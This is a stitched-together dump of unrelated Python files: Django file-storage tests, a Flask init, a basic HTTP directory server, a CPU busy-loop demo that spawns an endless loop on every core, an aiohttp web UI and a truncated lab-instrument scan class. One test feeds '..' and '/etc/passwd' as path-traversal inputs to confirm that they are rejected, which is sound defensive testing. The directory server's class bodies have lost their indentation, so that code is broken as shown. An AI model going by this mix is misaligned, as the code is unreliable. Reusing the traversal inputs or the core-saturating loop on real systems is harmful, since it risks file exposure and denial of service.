    storage = self.storage_class(location=self.temp_dir, base_url='/no_ending_slash')
    self.assertEqual(storage.url('test.file'), '%s%s' % (storage.base_url, 'test.file'))
def test_listdir(self):
    """listdir() returns a (directories, files) pair."""
    for missing in ('storage_test_1', 'storage_test_2', 'storage_dir_1'):
        self.assertFalse(self.storage.exists(missing))

    self.storage.save('storage_test_1', ContentFile('custom content'))
    self.storage.save('storage_test_2', ContentFile('custom content'))
    os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))

    dirs, files = self.storage.listdir('')
    self.assertEqual(set(dirs), {'storage_dir_1'})
    self.assertEqual(set(files), {'storage_test_1', 'storage_test_2'})

    self.storage.delete('storage_test_1')
    self.storage.delete('storage_test_2')
    os.rmdir(os.path.join(self.temp_dir, 'storage_dir_1'))
def test_file_storage_prevents_directory_traversal(self):
    """
    Paths escaping the storage location raise SuspiciousOperation — files
    can only be accessed below the storage root.
    """
    for escaping_path in ('..', '/etc/passwd'):
        with self.assertRaises(SuspiciousOperation):
            self.storage.exists(escaping_path)
def test_file_storage_preserves_filename_case(self):
    """The storage backend should preserve the case of filenames."""
    mixed_case = 'CaSe_SeNsItIvE'
    # A second backend rooted at the mixed-case temp directory.
    other_temp_storage = self.storage_class(location=self.temp_dir2)
    with other_temp_storage.open(mixed_case, 'w') as stored:
        stored.write('storage contents')
    self.assertEqual(os.path.join(self.temp_dir2, mixed_case), other_temp_storage.path(mixed_case))
    other_temp_storage.delete(mixed_case)
def test_makedirs_race_handling(self):
    """
    File storage should be robust against directory creation race conditions.
    """
    real_makedirs = os.makedirs

    # Monkey-patch os.makedirs, to simulate a normal call, a raced call,
    # and an error.
    def fake_makedirs(path):
        if path == os.path.join(self.temp_dir, 'normal'):
            real_makedirs(path)
        elif path == os.path.join(self.temp_dir, 'raced'):
            # Create the directory, then pretend another process beat us
            # to it by raising EEXIST anyway.
            real_makedirs(path)
            raise OSError(errno.EEXIST, 'simulated EEXIST')
        elif path == os.path.join(self.temp_dir, 'error'):
            raise OSError(errno.EACCES, 'simulated EACCES')
        else:
            self.fail('unexpected argument %r' % path)

    try:
        os.makedirs = fake_makedirs

        self.storage.save('normal/test.file', ContentFile('saved normally'))
        with self.storage.open('normal/test.file') as f:
            self.assertEqual(f.read(), b'saved normally')

        # EEXIST from a racing mkdir is swallowed and the save succeeds.
        self.storage.save('raced/test.file', ContentFile('saved with race'))
        with self.storage.open('raced/test.file') as f:
            self.assertEqual(f.read(), b'saved with race')

        # OSErrors aside from EEXIST are still raised.
        with self.assertRaises(OSError):
            self.storage.save('error/test.file', ContentFile('not saved'))
    finally:
        os.makedirs = real_makedirs
def test_remove_race_handling(self):
    """
    File storage should be robust against file removal race conditions.
    """
    real_remove = os.remove

    # Monkey-patch os.remove, to simulate a normal call, a raced call,
    # and an error.
    def fake_remove(path):
        if path == os.path.join(self.temp_dir, 'normal.file'):
            real_remove(path)
        elif path == os.path.join(self.temp_dir, 'raced.file'):
            # Remove the file, then pretend another process got there
            # first by raising ENOENT anyway.
            real_remove(path)
            raise OSError(errno.ENOENT, 'simulated ENOENT')
        elif path == os.path.join(self.temp_dir, 'error.file'):
            raise OSError(errno.EACCES, 'simulated EACCES')
        else:
            self.fail('unexpected argument %r' % path)

    try:
        os.remove = fake_remove

        self.storage.save('normal.file', ContentFile('delete normally'))
        self.storage.delete('normal.file')
        self.assertFalse(self.storage.exists('normal.file'))

        self.storage.save('raced.file', ContentFile('delete with race'))
        self.storage.delete('raced.file')
        # Bug fix: assert on the file that was actually deleted in this
        # step ('raced.file'); the original checked 'normal.file', which
        # was already verified above, so the raced deletion went untested.
        self.assertFalse(self.storage.exists('raced.file'))

        # OSErrors aside from ENOENT are still raised.
        self.storage.save('error.file', ContentFile('delete with error'))
        with self.assertRaises(OSError):
            self.storage.delete('error.file')
    finally:
        os.remove = real_remove
def test_file_chunks_error(self):
    """An IOError raised by file.chunks() propagates out of save()."""
    broken = ContentFile('chunks fails')

    def failing_chunks():
        raise IOError

    broken.chunks = failing_chunks
    with self.assertRaises(IOError):
        self.storage.save('error.file', broken)
def test_delete_no_name(self):
    """
    delete() with an empty name must not try to remove the base storage
    directory; it fails loudly instead (#20660).
    """
    with self.assertRaises(AssertionError):
        self.storage.delete('')
@override_settings(
    MEDIA_ROOT='media_root',
    MEDIA_URL='media_url/',
    FILE_UPLOAD_PERMISSIONS=0o777,
    FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o777,
)
def test_setting_changed(self):
    """
    Properties using settings values as defaults should be updated on
    referenced settings change while specified values should be unchanged.
    """
    # Explicit constructor arguments must win over settings overrides.
    storage = self.storage_class(
        location='explicit_location',
        base_url='explicit_base_url/',
        file_permissions_mode=0o666,
        directory_permissions_mode=0o666,
    )
    # No arguments: every property falls back to the current settings.
    defaults_storage = self.storage_class()
    settings = {
        'MEDIA_ROOT': 'overriden_media_root',
        'MEDIA_URL': 'overriden_media_url/',
        'FILE_UPLOAD_PERMISSIONS': 0o333,
        'FILE_UPLOAD_DIRECTORY_PERMISSIONS': 0o333,
    }
    with self.settings(**settings):
        # Explicitly configured storage ignores the overridden settings.
        self.assertEqual(storage.base_location, 'explicit_location')
        self.assertIn('explicit_location', storage.location)
        self.assertEqual(storage.base_url, 'explicit_base_url/')
        self.assertEqual(storage.file_permissions_mode, 0o666)
        self.assertEqual(storage.directory_permissions_mode, 0o666)
        # Defaults-based storage tracks the overridden settings live.
        self.assertEqual(defaults_storage.base_location, settings['MEDIA_ROOT'])
        self.assertIn(settings['MEDIA_ROOT'], defaults_storage.location)
        self.assertEqual(defaults_storage.base_url, settings['MEDIA_URL'])
        self.assertEqual(defaults_storage.file_permissions_mode, settings['FILE_UPLOAD_PERMISSIONS'])
        self.assertEqual(
            defaults_storage.directory_permissions_mode, settings['FILE_UPLOAD_DIRECTORY_PERMISSIONS']
        )
class CustomStorage(FileSystemStorage):
    """Storage that resolves name clashes with numeric suffixes."""

    def get_available_name(self, name, max_length=None):
        """
        Append numbers to duplicate files rather than underscores, like Trac.
        """
        pieces = name.split('.')
        stem, extensions = pieces[0], pieces[1:]
        counter = 2
        # Keep bumping the counter until the candidate name is free.
        while self.exists(name):
            name = '.'.join([stem, str(counter)] + extensions)
            counter += 1
        return name
class CustomStorageTests(FileStorageTests):
    """Re-run the storage suite with numeric-suffix name resolution."""

    storage_class = CustomStorage

    def test_custom_get_available_name(self):
        """Duplicate names get numeric suffixes (.2, .3, ...) appended."""
        saved_names = [
            self.storage.save('custom_storage', ContentFile(content))
            for content in ('custom contents', 'more contents')
        ]
        self.assertEqual(saved_names, ['custom_storage', 'custom_storage.2'])
        for saved in saved_names:
            self.storage.delete(saved)
class DiscardingFalseContentStorage(FileSystemStorage):
    """Storage that silently drops falsy content instead of writing it."""

    def _save(self, name, content):
        if not content:
            # Falsy content (empty file-like, None, ...) is discarded;
            # report an empty stored name.
            return ''
        return super(DiscardingFalseContentStorage, self)._save(name, content)
class DiscardingFalseContentStorageTests(FileStorageTests):
    """Re-run the storage suite with the falsy-content-discarding backend."""

    storage_class = DiscardingFalseContentStorage

    def test_custom_storage_discarding_empty_content(self):
        """
        When Storage.save() wraps a file-like object in File, it should
        include the name argument so bool(file) evaluates to True (#26495).
        """
        self.storage.save('tests/stringio', StringIO('content'))
        self.assertTrue(self.storage.exists('tests/stringio'))
        with self.storage.open('tests/stringio') as stored:
            self.assertEqual(stored.read(), b'content')
class FileFieldStorageTests(TestCase):
    """FileField/FileDescriptor behavior backed by the module's temp storage."""

    def tearDown(self):
        shutil.rmtree(temp_storage_location)

    def _storage_max_filename_length(self, storage):
        """
        Query filesystem for maximum filename length (e.g. AUFS has 242).
        """
        # Walk up to the nearest existing directory; pathconf() needs a
        # real path to query.
        dir_to_test = storage.location
        while not os.path.exists(dir_to_test):
            dir_to_test = os.path.dirname(dir_to_test)
        try:
            return os.pathconf(dir_to_test, 'PC_NAME_MAX')
        except Exception:
            return 255  # Should be safe on most backends

    def test_files(self):
        """End-to-end behavior of a plain FileField attribute."""
        self.assertIsInstance(Storage.normal, FileDescriptor)

        # An object without a file has limited functionality.
        obj1 = Storage()
        self.assertEqual(obj1.normal.name, "")
        with self.assertRaises(ValueError):
            obj1.normal.size

        # Saving a file enables full functionality.
        obj1.normal.save("django_test.txt", ContentFile("content"))
        self.assertEqual(obj1.normal.name, "tests/django_test.txt")
        self.assertEqual(obj1.normal.size, 7)
        self.assertEqual(obj1.normal.read(), b"content")
        obj1.normal.close()

        # File objects can be assigned to FileField attributes, but shouldn't
        # get committed until the model it's attached to is saved.
        obj1.normal = SimpleUploadedFile("assignment.txt", b"content")
        dirs, files = temp_storage.listdir("tests")
        self.assertEqual(dirs, [])
        self.assertNotIn("assignment.txt", files)

        obj1.save()
        dirs, files = temp_storage.listdir("tests")
        self.assertEqual(sorted(files), ["assignment.txt", "django_test.txt"])

        # Save another file with the same name.
        obj2 = Storage()
        obj2.normal.save("django_test.txt", ContentFile("more content"))
        obj2_name = obj2.normal.name
        self.assertRegex(obj2_name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
        self.assertEqual(obj2.normal.size, 12)
        obj2.normal.close()

        # Deleting an object does not delete the file it uses.
        obj2.delete()
        obj2.normal.save("django_test.txt", ContentFile("more content"))
        self.assertNotEqual(obj2_name, obj2.normal.name)
        self.assertRegex(obj2.normal.name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
        obj2.normal.close()

    def test_filefield_read(self):
        # Files can be read in a little at a time, if necessary.
        obj = Storage.objects.create(
            normal=SimpleUploadedFile("assignment.txt", b"content"))
        obj.normal.open()
        self.assertEqual(obj.normal.read(3), b"con")
        self.assertEqual(obj.normal.read(), b"tent")
        self.assertEqual(list(obj.normal.chunks(chunk_size=2)), [b"co", b"nt", b"en", b"t"])
        obj.normal.close()

    def test_filefield_write(self):
        # Files can be written to.
        obj = Storage.objects.create(normal=SimpleUploadedFile('rewritten.txt', b'content'))
        with obj.normal as normal:
            normal.open('wb')
            normal.write(b'updated')
        obj.refresh_from_db()
        self.assertEqual(obj.normal.read(), b'updated')
        obj.normal.close()

    def test_filefield_reopen(self):
        # Reopening via the field and via the underlying file both work.
        obj = Storage.objects.create(normal=SimpleUploadedFile('reopen.txt', b'content'))
        with obj.normal as normal:
            normal.open()
        obj.normal.open()
        obj.normal.file.seek(0)
        obj.normal.close()

    def test_duplicate_filename(self):
        # Multiple files with the same name get _(7 random chars) appended to them.
        objs = [Storage() for i in range(2)]
        for o in objs:
            o.normal.save("multiple_files.txt", ContentFile("Same Content"))
        try:
            names = [o.normal.name for o in objs]
            self.assertEqual(names[0], "tests/multiple_files.txt")
            self.assertRegex(names[1], "tests/multiple_files_%s.txt" % FILE_SUFFIX_REGEX)
        finally:
            for o in objs:
                o.delete()

    def test_file_truncation(self):
        # Given the max_length is limited, when multiple files get uploaded
        # under the same name, then the filename get truncated in order to fit
        # in _(7 random chars). When most of the max_length is taken by
        # dirname + extension and there are not enough characters in the
        # filename to truncate, an exception should be raised.
        objs = [Storage() for i in range(2)]
        filename = 'filename.ext'

        for o in objs:
            o.limited_length.save(filename, ContentFile('Same Content'))
        try:
            # Testing truncation.
            names = [o.limited_length.name for o in objs]
            self.assertEqual(names[0], 'tests/%s' % filename)
            self.assertRegex(names[1], 'tests/fi_%s.ext' % FILE_SUFFIX_REGEX)

            # Testing exception is raised when filename is too short to truncate.
            filename = 'short.longext'
            objs[0].limited_length.save(filename, ContentFile('Same Content'))
            with self.assertRaisesMessage(SuspiciousFileOperation, 'Storage can not find an available filename'):
                objs[1].limited_length.save(*(filename, ContentFile('Same Content')))
        finally:
            for o in objs:
                o.delete()

    @unittest.skipIf(
        sys.platform.startswith('win'),
        "Windows supports at most 260 characters in a path.",
    )
    def test_extended_length_storage(self):
        # Testing FileField with max_length > 255. Most systems have filename
        # length limitation of 255. Path takes extra chars.
        filename = (self._storage_max_filename_length(temp_storage) - 4) * 'a'  # 4 chars for extension.
        obj = Storage()
        obj.extended_length.save('%s.txt' % filename, ContentFile('Same Content'))
        self.assertEqual(obj.extended_length.name, 'tests/%s.txt' % filename)
        self.assertEqual(obj.extended_length.read(), b'Same Content')
        obj.extended_length.close()

    def test_filefield_default(self):
        # Default values allow an object to access a single file.
        temp_storage.save('tests/default.txt', ContentFile('default content'))
        obj = Storage.objects.create()
        self.assertEqual(obj.default.name, "tests/default.txt")
        self.assertEqual(obj.default.read(), b"default content")
        obj.default.close()

        # But it shouldn't be deleted, even if there are no more objects using
        # it.
        obj.delete()
        obj = Storage()
        self.assertEqual(obj.default.read(), b"default content")
        obj.default.close()

    def test_empty_upload_to(self):
        # upload_to can be empty, meaning it does not use subdirectory.
        obj = Storage()
        obj.empty.save('django_test.txt', ContentFile('more content'))
        self.assertEqual(obj.empty.name, "django_test.txt")
        self.assertEqual(obj.empty.read(), b"more content")
        obj.empty.close()

    def test_random_upload_to(self):
        # Verify the fix for #5655, making sure the directory is only
        # determined once.
        obj = Storage()
        obj.random.save("random_file", ContentFile("random content"))
        self.assertTrue(obj.random.name.endswith("/random_file"))
        obj.random.close()

    def test_custom_valid_name_callable_upload_to(self):
        """
        Storage.get_valid_name() should be called when upload_to is a callable.
        """
        obj = Storage()
        obj.custom_valid_name.save("random_file", ContentFile("random content"))
        # CustomValidNameStorage.get_valid_name() appends '_valid' to the name
        self.assertTrue(obj.custom_valid_name.name.endswith("/random_file_valid"))
        obj.custom_valid_name.close()

    def test_filefield_pickling(self):
        # Push an object into the cache to make sure it pickles properly
        obj = Storage()
        obj.normal.save("django_test.txt", ContentFile("more content"))
        obj.normal.close()
        cache.set("obj", obj)
        self.assertEqual(cache.get("obj").normal.name, "tests/django_test.txt")

    def test_file_object(self):
        # Create sample file
        temp_storage.save('tests/example.txt', ContentFile('some content'))

        # Load it as python file object
        with open(temp_storage.path('tests/example.txt')) as file_obj:
            # Save it using storage and read its content
            temp_storage.save('tests/file_obj', file_obj)
        self.assertTrue(temp_storage.exists('tests/file_obj'))
        with temp_storage.open('tests/file_obj') as f:
            self.assertEqual(f.read(), b'some content')

    def test_stringio(self):
        # Test passing StringIO instance as content argument to save
        output = StringIO()
        output.write('content')
        output.seek(0)

        # Save it and read written file
        temp_storage.save('tests/stringio', output)
        self.assertTrue(temp_storage.exists('tests/stringio'))
        with temp_storage.open('tests/stringio') as f:
            self.assertEqual(f.read(), b'content')
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
    """ContentFile whose chunks() stalls, widening the save() race window."""

    def chunks(self):
        # The sleep gives a concurrent save() time to pick the same name.
        time.sleep(1)
        # NOTE(review): super(ContentFile, self) deliberately skips
        # ContentFile in the MRO and calls the parent's chunks() —
        # preserved as-is; confirm this is intentional.
        return super(ContentFile, self).chunks()
class FileSaveRaceConditionTest(SimpleTestCase):
    """Two concurrent saves of the same name must not clobber each other (#4948)."""

    def setUp(self):
        self.storage_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(self.storage_dir)
        # Background saver racing against the foreground save below.
        self.thread = threading.Thread(target=self.save_file, args=['conflict'])

    def tearDown(self):
        shutil.rmtree(self.storage_dir)

    def save_file(self, name):
        name = self.storage.save(name, SlowFile(b"Data"))

    def test_race_condition(self):
        self.thread.start()
        self.save_file('conflict')
        self.thread.join()
        saved = sorted(os.listdir(self.storage_dir))
        # One save keeps the plain name; the loser gets a random suffix.
        self.assertEqual(saved[0], 'conflict')
        self.assertRegex(saved[1], 'conflict_%s' % FILE_SUFFIX_REGEX)
@unittest.skipIf(sys.platform.startswith('win'), "Windows only partially supports umasks and chmod.")
class FileStoragePermissions(unittest.TestCase):
    """FILE_UPLOAD_*_PERMISSIONS settings control saved file/dir modes."""

    def setUp(self):
        self.umask = 0o027
        self.old_umask = os.umask(self.umask)
        self.storage_dir = tempfile.mkdtemp()

    def tearDown(self):
        shutil.rmtree(self.storage_dir)
        os.umask(self.old_umask)

    def _mode_of(self, path):
        # Permission bits only.
        return os.stat(path)[0] & 0o777

    @override_settings(FILE_UPLOAD_PERMISSIONS=0o654)
    def test_file_upload_permissions(self):
        self.storage = FileSystemStorage(self.storage_dir)
        name = self.storage.save("the_file", ContentFile("data"))
        self.assertEqual(self._mode_of(self.storage.path(name)), 0o654)

    @override_settings(FILE_UPLOAD_PERMISSIONS=None)
    def test_file_upload_default_permissions(self):
        self.storage = FileSystemStorage(self.storage_dir)
        fname = self.storage.save("some_file", ContentFile("data"))
        self.assertEqual(self._mode_of(self.storage.path(fname)), 0o666 & ~self.umask)

    @override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o765)
    def test_file_upload_directory_permissions(self):
        self.storage = FileSystemStorage(self.storage_dir)
        name = self.storage.save("the_directory/the_file", ContentFile("data"))
        self.assertEqual(self._mode_of(os.path.dirname(self.storage.path(name))), 0o765)

    @override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=None)
    def test_file_upload_directory_default_permissions(self):
        self.storage = FileSystemStorage(self.storage_dir)
        name = self.storage.save("the_directory/the_file", ContentFile("data"))
        self.assertEqual(self._mode_of(os.path.dirname(self.storage.path(name))), 0o777 & ~self.umask)
class FileStoragePathParsing(SimpleTestCase):
    """Collision mangling must touch the file name, never its directory."""

    def setUp(self):
        self.storage_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(self.storage_dir)

    def tearDown(self):
        shutil.rmtree(self.storage_dir)

    def _save_twice_and_list(self, name):
        # Save the same name twice and return the sorted listing of the
        # 'dotted.path' subdirectory.
        self.storage.save(name, ContentFile("1"))
        self.storage.save(name, ContentFile("2"))
        return sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))

    def test_directory_with_dot(self):
        """Regression test for #9610: a dot in the directory name must not
        be mistaken for the file extension — the file name gets mangled,
        not the directory."""
        entries = self._save_twice_and_list('dotted.path/test')
        self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
        self.assertEqual(entries[0], 'test')
        self.assertRegex(entries[1], 'test_%s' % FILE_SUFFIX_REGEX)

    def test_first_character_dot(self):
        """
        File names with a dot as their first character don't have an
        extension, so the underscore suffix goes at the end.
        """
        entries = self._save_twice_and_list('dotted.path/.test')
        self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
        self.assertEqual(entries[0], '.test')
        self.assertRegex(entries[1], '.test_%s' % FILE_SUFFIX_REGEX)
class ContentFileStorageTestCase(unittest.TestCase):
    """ContentFile saves correctly whether built from bytes or unicode."""

    def setUp(self):
        self.storage_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(self.storage_dir)

    def tearDown(self):
        shutil.rmtree(self.storage_dir)

    def test_content_saving(self):
        """Both bytes and unicode ContentFile payloads can be saved."""
        for filename, payload in (('bytes.txt', b"content"), ('unicode.txt', "español")):
            self.storage.save(filename, ContentFile(payload))
@override_settings(ROOT_URLCONF='file_storage.urls')
class FileLikeObjectTestCase(LiveServerTestCase):
    """
    The storage API accepts generic file-like objects (#15644).
    """
    available_apps = []

    def setUp(self):
        self.temp_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(location=self.temp_dir)

    def tearDown(self):
        shutil.rmtree(self.temp_dir)

    def test_urllib2_urlopen(self):
        """A urlopen() response can be wrapped in File and saved."""
        response = urlopen(self.live_server_url + '/')
        stored_filename = self.storage.save("remote_file.html", File(response))
        # Fetch the page again and compare it with the stored copy.
        fresh_response = urlopen(self.live_server_url + '/')
        with self.storage.open(stored_filename) as stored_file:
            self.assertEqual(stored_file.read(), fresh_response.read())
|
__init__.py | # To avoid disorganized imports and declarations, I created another file to initialize the app
from .__server_socket__ import app, socketio, render_template, send, requestFlask
from app import views, api_views, socketio_views
from threading import Thread
# Background worker that periodically refreshes coin data from the API.
task_coins = Thread(target=socketio_views.update_coins_from_api)
task_coins.start()

# Bug fix: pass the function itself, not the result of calling it.
# The original `target=socketio_views.send_current_coins_value()` executed
# the (long-running) function at import time on the main thread and handed
# its return value to Thread, so no worker thread ever ran it.
task_send_coins_value = Thread(target=socketio_views.send_current_coins_value)
task_send_coins_value.start()
|
directory_server.py | # ===============================================================================
# Copyright 2012 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
from __future__ import print_function
from traits.api import String, Str, Int
# from traitsui.api import View, Item, TableEditor
# ============= standard library imports ========================
from six.moves.BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from cStringIO import StringIO
import cgi
# import string, cgi, time
import os # os. path
import six.moves.urllib.request, six.moves.urllib.parse, six.moves.urllib.error
import posixpath
import sys
import shutil
import mimetypes
from threading import Thread
# ============= local library imports ==========================
# ===============================================================================
# for debugging
# ===============================================================================
# Debugging aid: make a development checkout of pychron_uv importable when
# running this module directly.
merc = os.path.join(os.path.expanduser("~"), "Programming", "mercurial")
src = os.path.join(merc, "pychron_uv")
sys.path.insert(0, src)
# ===============================================================================
#
# ===============================================================================
from pychron.loggable import Loggable

if not mimetypes.inited:
    mimetypes.init()  # try to read system mime.types
class DirectoryHandler(BaseHTTPRequestHandler):
extensions_map = mimetypes.types_map.copy()
extensions_map.update(
{
"": "application/octet-stream", # Default
".py": "text/plain",
".c": "text/plain",
".h": "text/plain",
}
)
def do_GET(self):
f = self.send_head()
if f:
self._copy_file(f, self.wfile)
f.close()
def do_HEAD(self):
f = self.send_head()
if f:
f.close()
def send_head(self):
"""Common code for GET and HEAD commands.
This sends the response code and MIME headers.
Return value is either a file object (which has to be copied
to the outputfile by the caller unless the command was HEAD,
and must be closed by the caller under all circumstances), or
None, in which case the caller has nothing further to do.
"""
path = self._translate_path(self.path)
f = None
if os.path.isdir(path):
if not self.path.endswith("/"):
# redirect browser - doing basically what apache does
self.send_response(301)
self.send_header("Location", self.path + "/")
self.end_headers()
return None
for index in "index.html", "index.htm":
index = os.path.join(path, index)
if os.path.exists(index):
path = index
break
else:
return self._list_directory(path)
ctype = self.guess_type(path)
try:
# Always read in binary mode. Opening files in text mode may cause
# newline translations, making the actual size of the content
# transmitted *less* than the content-length!
f = open(path, "rb")
except IOError:
self.send_error(404, "File not found")
return None
self.send_response(200)
self.send_header("Content-type", ctype)
fs = os.fstat(f.fileno())
self.send_header("Content-Length", str(fs[6]))
self.send_header("Last-Modified", self.date_time_string(fs.st_mtime))
self.end_headers()
return f
def _copy_file(self, source, outputfile):
shutil.copyfileobj(source, outputfile)
def _list_directory(self, path):
"""Helper to produce a directory listing (absent index.html).
Return value is either a file object, or None (indicating an
error). In either case, the headers are sent, making the
interface the same as for send_head().
"""
try:
ll = os.listdir(path)
except os.error:
self.send_error(404, "No permission to ll directory")
return None
ll.sort(key=lambda a: a.lower())
f = StringIO()
displaypath = cgi.escape(six.moves.urllib.parse.unquote(self.path))
f.write('<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">')
f.write("<html>\n<title>Directory listing for %s</title>\n" % displaypath)
f.write("<body>\n<h2>Directory listing for %s</h2>\n" % displaypath)
f.write("<hr>\n<ul>\n")
for name in ll:
fullname = os.path.join(path, name)
displayname = linkname = name
# Append / for directories or @ for symbolic links
if os.path.isdir(fullname):
displayname = name + "/"
linkname = name + "/"
if os.path.islink(fullname):
displayname = name + "@"
# Note: a link to a directory displays with @ and links with /
f.write(
'<li><a href="%s">%s</a>\n'
% (six.moves.urllib.parse.quote(linkname), cgi.escape(displayname))
)
f.write("</ul>\n<hr>\n</body>\n</html>\n")
length = f.tell()
f.seek(0)
self.send_response(200)
encoding = sys.getfilesystemencoding()
self.send_header("Content-type", "text/html; charset=%s" % encoding)
self.send_header("Content-Length", str(length))
self.end_headers()
return f
def _translate_path(self, path):
    """Translate a /-separated PATH to the local filename syntax.

    Components that mean special things to the local file system
    (e.g. drive or directory names) are ignored. (XXX They should
    probably be diagnosed.)
    """
    # Abandon the query string and fragment, if present.
    path = path.split("?", 1)[0].split("#", 1)[0]
    path = posixpath.normpath(six.moves.urllib.parse.unquote(path))
    # Rebuild the path below the configured server root, one component
    # at a time, discarding anything drive-like or dot-like.
    result = self.server.root
    for component in path.split("/"):
        if not component:
            continue
        _drive, component = os.path.splitdrive(component)
        _head, component = os.path.split(component)
        if component in (os.curdir, os.pardir):
            continue
        result = os.path.join(result, component)
    return result
def guess_type(self, path):
    """Guess the MIME type of a file.

    Argument is a PATH (a filename). Return value is a string of the
    form type/subtype, usable for a MIME Content-type header. The
    extension is looked up in self.extensions_map — first verbatim,
    then lower-cased — falling back to the "" (octet-stream) entry.
    """
    _base, ext = posixpath.splitext(path)
    for candidate in (ext, ext.lower()):
        if candidate in self.extensions_map:
            return self.extensions_map[candidate]
    return self.extensions_map[""]
class _DirectoryServer(HTTPServer):
    # Thin HTTPServer subclass that carries the directory being served;
    # the request handler reads ``server.root`` when translating paths.
    root = ""
class DirectoryServer(Loggable):
    """Traits-based wrapper that runs a ``_DirectoryServer`` on a thread.

    ``root``/``host``/``port`` are trait declarations; changing ``root``
    while the server is running is propagated via ``_root_changed``.
    """

    root = String
    host = Str
    port = Int
    _server = None

    def _root_changed(self):
        # Traits change handler: keep the running server's root in sync.
        server = self._server
        if server:
            server.root = self.root

    def start(self):
        """Launch the server on a background thread; return the thread."""
        worker = Thread(target=self._start)
        worker.start()
        return worker

    def _start(self):
        # Blocks in serve_forever(); meant to run on the thread from start().
        self.info("Directory server started. {} {}".format(self.host, self.port))
        self.info("serving {}".format(self.root))
        host = self.host or "localhost"
        port = self.port or 8080
        self._server = _DirectoryServer((host, port), DirectoryHandler)
        self._server.root = self.root
        self._server.serve_forever()

    def stop(self):
        """Ask the underlying HTTPServer to exit its serve loop."""
        self._server.shutdown()
def serve(root="/Users/ross/Sandbox/raster", host="localhost", port=8080):
    """Convenience entry point: serve *root* over HTTP until interrupted.

    Parameters (new, backward-compatible defaults match the old
    hard-coded values):
        root: directory to serve.
        host, port: bind address for the server.
    """
    try:
        server = DirectoryServer(host=host, port=port)
        server.root = root
        print("started httpserver...")
        server.start()
    except KeyboardInterrupt:
        print("^C received, shutting down server")
        # Bug fix: DirectoryServer has no ``socket`` attribute (the old
        # ``server.socket.close()`` raised AttributeError); use stop().
        server.stop()
def main():
    # Script entry point: run the demo directory server.
    serve()
if __name__ == "__main__":
main()
# ============= EOF =============================================
|
process_demo.py | from multiprocessing import Process
import os
def loop():
    # Deliberate busy loop: spins forever to pin one CPU core per
    # worker process (CPU-load demo).
    i = 0
    while True:
        i += 1
def main():
    """Spawn one busy-loop worker process per available CPU core."""
    print('start')
    workers = [Process(target=loop) for _ in range(os.cpu_count())]
    for worker in workers:
        worker.start()
if __name__ == '__main__':
main()
|
visual_cortex.py | # Python Modules
from multiprocessing import Process
import sys
import pathlib
import time
# Web server Modules
from aiohttp import web
import aiohttp_jinja2
import jinja2
# Deeplodocus modules
from deeplodocus.utils.notification import Notification
from deeplodocus.brain.visual_cortex.routes import Routes
from deeplodocus.brain.visual_cortex.middlewares import setup_middlewares
# Deeplodocus flags
from deeplodocus.utils.flags.notif import *
class VisualCortex(object):
    """A user interface accessible via a web browser.

    Runs an aiohttp web server in a daemonized child process so the
    main Deeplodocus process keeps control.

    :author: Alix Leroy
    TODO : Include Plotly for better visualization
    """

    def __init__(self):
        """Start the user interface in a second process linked to the main one."""
        self.process = Process(target=self.__run, args=())
        # Daemonize so the child is killed together with the parent.
        self.process.daemon = True
        self.process.start()
        # Give the server a moment to come up before returning.
        time.sleep(0.5)

    def __run(self):
        """Configure and run the aiohttp application (blocks until shutdown)."""
        root = pathlib.Path(__file__).parent
        host = "0.0.0.0"
        port = 8080
        Notification(DEEP_NOTIF_SUCCESS, "Brain : Visual Cortex running on : http://%s:%i" % (host, port))
        # Build the application, attach templates, routes and middlewares.
        app = web.Application()
        aiohttp_jinja2.setup(app, loader=jinja2.PackageLoader('deeplodocus', 'brain/visual_cortex/templates'))
        Routes().setup_routes(app=app, project_root=root)
        setup_middlewares(app)
        web.run_app(app=app, print=None, host=host, port=port)
        Notification(DEEP_NOTIF_SUCCESS, "Visual Cortex sleeping.")
        sys.exit(0)  # terminate the child process once the server stops

    def stop(self):
        """Stop the server by terminating the child process."""
        self.process.terminate()
|
workflow.py | from functools import wraps
from datetime import datetime
import time
import sys
import lttb
import numpy as np
import threading
import os
import warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
import ipdb
import scipy.io as io
from copy import copy
# from tranmission_Forge import MZCalibrate
from matplotlib.animation import FuncAnimation
work_dir = path = os.path.abspath(__file__ + '/..')
path = 'Z:/PythonSoftware/NewInstrumentControl'
if not path in sys.path:
sys.path.insert(0, path)
# import pyUtilities as ut
# import msvcrt
from pyLaser import NewFocus6700,Toptica1050
from pyWavemeter import Wavemeter
from pyPowerMeter import ThorlabsP1xx
# from workers import DcScan, FreeScan
import h5py
from nidaqmx.constants import AcquisitionType, TaskMode
import nidaqmx
from plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot
import plotly.graph_objs as go
import matplotlib.pyplot as plt
import ipywidgets as widgets
from ipywidgets import interact, interactive, Layout
class DCScan():
    """DC transmission scan: sweep the laser over its scan limits while the
    DAQ records the transmission (T) and Mach-Zehnder reference (MZ)
    channels, optionally reading power meters and a wavemeter, then plot
    and return the acquired traces.
    """

    def __init__(self, **kwargs):
        # Instruments (all optional; None disables the corresponding step).
        self.lsr = kwargs.get('laser', None)
